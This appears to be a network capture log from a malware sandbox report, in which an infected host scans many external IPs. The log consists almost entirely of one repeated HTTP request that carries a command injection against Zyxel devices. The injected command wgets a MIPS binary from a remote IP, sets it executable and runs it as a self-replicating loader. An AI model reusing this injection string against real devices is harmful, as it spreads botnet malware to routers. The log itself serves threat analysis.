                                                Jan 12, 2024 18:24:30.712274075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3029192.168.2.1344854195.74.66.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712307930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3030192.168.2.1341924140.125.84.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712372065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3031192.168.2.1350240140.49.213.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712445974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3032192.168.2.136048269.142.120.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712537050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3033192.168.2.1334984191.155.226.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712585926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3034192.168.2.1349072124.107.233.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712661028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3035192.168.2.1340966174.182.133.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712760925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3036192.168.2.1358454210.43.34.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712786913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3037192.168.2.1342184203.148.92.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712865114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3038192.168.2.1350904135.222.37.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712949038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3039192.168.2.133994252.100.76.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.712990046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3040192.168.2.1349544206.170.66.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713026047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3041192.168.2.1352784167.251.74.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713107109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3042192.168.2.134610024.207.217.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713188887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3043192.168.2.1339430202.24.194.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713265896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3044192.168.2.135375431.236.65.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713335991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3045192.168.2.1336932185.20.46.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713395119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3046192.168.2.133527869.243.85.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713455915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3047192.168.2.1339662223.138.195.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713515043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3048192.168.2.134935450.66.230.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713604927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3049192.168.2.1357412161.8.98.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713685036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3050192.168.2.1350340179.69.152.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713766098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3051192.168.2.1341110119.224.106.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713850975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3052192.168.2.1360144189.179.222.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713905096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3053192.168.2.135967897.162.198.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.713974953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3054192.168.2.1339970115.98.208.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714059114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3055192.168.2.1334374106.118.52.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714118958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3056192.168.2.135261264.128.2.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714159012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3057192.168.2.134187058.168.250.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714236021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3058192.168.2.1342734147.30.207.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714323044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3059192.168.2.135108281.163.182.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714374065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3060192.168.2.133603894.31.194.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714446068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3061192.168.2.135164653.79.146.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714524031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3062192.168.2.134596446.71.212.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714596987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3063192.168.2.133465868.178.221.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714662075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3064192.168.2.1333748157.170.50.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714736938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3065192.168.2.135237254.78.140.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714812040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3066192.168.2.1339386113.44.133.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714879036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3067192.168.2.1339494204.150.47.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714934111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3068192.168.2.1342102120.12.57.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.714994907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3069192.168.2.133316054.174.224.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715055943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3070192.168.2.133685062.167.206.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715116978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3071192.168.2.13501801.40.126.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715179920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3072192.168.2.134634027.55.149.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715231895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3073192.168.2.134533071.155.171.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715303898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3074192.168.2.1356354193.68.237.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715382099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3075192.168.2.13481349.220.238.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715465069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3076192.168.2.1357002109.229.208.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715524912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3077192.168.2.1348080218.58.115.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715593100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3078192.168.2.1347156134.239.217.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715667009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3079192.168.2.1350608129.1.231.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715740919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3080192.168.2.1355240100.226.215.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715786934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3081192.168.2.136015823.85.41.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715836048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3082192.168.2.1357326180.163.160.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715893030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3083192.168.2.135453849.8.181.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.715971947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3084192.168.2.1335830185.174.67.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716046095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3085192.168.2.1344164162.113.20.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716105938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3086192.168.2.1347266139.129.62.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716176987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3087192.168.2.1338556212.216.119.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716240883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3088192.168.2.1355360108.177.48.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716304064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3089192.168.2.1338106109.72.69.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716367006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3090192.168.2.1356690181.69.35.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.716444969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3091192.168.2.1339020175.224.178.160443
                                                TimestampBytes transferredDirectionData
